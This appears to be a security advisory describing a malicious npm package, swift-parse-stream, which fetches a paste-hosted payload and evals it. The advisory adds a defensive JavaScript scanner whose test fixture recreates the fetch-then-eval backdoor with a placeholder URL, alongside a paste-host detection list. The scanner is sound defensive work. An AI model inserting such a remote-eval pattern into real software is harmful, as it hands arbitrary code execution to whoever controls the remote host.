MAL-2026-6068
Malicious code in swift-parse-stream (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8ab8561c6c561b045d817d4fab3aa0754ce7cd767a3c5ec07b95151dda6b92c8)

swift-parse-stream advertises itself as an SVG sanitizer/minifier but ships an undocumented `getPlugin` export in index.js that, when invoked, performs an HTTP GET against https://www.jsonkeeper.com/b/3P9BF (an anonymous user-paste host) and runs `eval(parsed.model)` on the returned JSON's `model` field. The destination is attacker-controlled and mutable: whoever controls the paste can change the executed JavaScript at any time without republishing the package. The README does not mention this code path. Any caller — typically a second compromised package chaining into this one — that reaches `getPlugin()` hands arbitrary remote code execution to the paste's owner, running in the consumer application's process with its full privileges and access to its environment, filesystem, and network.
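The "fetch remote JSON, then `eval()` a field of it" shape described above is easy to flag statically. Below is an added heuristic scanner (not code from the advisory or from swift-parse-stream); the paste-host list, the regexes and both fixtures are assumptions chosen for illustration, and the suspicious fixture only mimics the reported shape.

```javascript
// Added example, not code from the advisory or from swift-parse-stream: a
// heuristic scanner for source that pairs an outbound request with a dynamic eval().
const PASTE_HOSTS = ['jsonkeeper.com', 'pastebin.com', 'paste.ee']; // assumed list

const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;
const FETCH_RE = /\b(?:https?\.(?:get|request)|fetch|axios(?:\.get)?)\s*\(/;
const EVAL_RE = /\beval\s*\(\s*([^)]*)\)/g;
const FUNC_CTOR_RE = /\bnew\s+Function\s*\(/;

// Returns a list of findings for one JavaScript source text.
function scanSource(src) {
  const findings = [];
  const hasFetch = FETCH_RE.test(src);
  for (const m of src.matchAll(EVAL_RE)) {
    const arg = m[1].trim();
    // eval('literal') is static; eval(parsed.model) or eval(body) is dynamic.
    const dynamic = arg.length > 0 && !/^['"`]/.test(arg);
    if (dynamic && hasFetch) findings.push({ kind: 'eval-of-fetched-data', arg });
  }
  if (hasFetch && FUNC_CTOR_RE.test(src)) findings.push({ kind: 'function-ctor-with-fetch' });
  for (const m of src.matchAll(URL_RE)) {
    const host = m[1].toLowerCase();
    if (PASTE_HOSTS.some((p) => host === p || host.endsWith('.' + p))) {
      findings.push({ kind: 'paste-host-url', host });
    }
  }
  return findings;
}

// Collapses findings into a triage level.
function riskLevel(findings) {
  const kinds = new Set(findings.map((f) => f.kind));
  if (kinds.has('eval-of-fetched-data') && kinds.has('paste-host-url')) return 'high';
  if (kinds.has('eval-of-fetched-data') || kinds.has('function-ctor-with-fetch')) return 'medium';
  return kinds.size > 0 ? 'low' : 'none';
}

// Constructed fixture with the shape the advisory describes (not the real index.js).
const SUSPICIOUS = `
exports.getPlugin = function () {
  https.get('https://www.jsonkeeper.com/b/PLACEHOLDER', (res) => {
    let body = ''; res.on('data', (c) => { body += c; });
    res.on('end', () => { const parsed = JSON.parse(body); eval(parsed.model); });
  });
};`;
// Constructed benign fixture: network use plus a static eval of a literal.
const BENIGN = `fetch('https://registry.npmjs.org/').then((r) => r.json()); eval('1+1');`;
```

Run `riskLevel(scanSource(src))` over each `.js` file in an unpacked tarball before installing; a `high` result means the file both evaluates fetched data and references a paste host, which is what the Amazon Inspector finding above describes.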
Affected packages
No fixed version published yet for swift-parse-stream (npm). Pin to a known-safe version or switch to an alternative.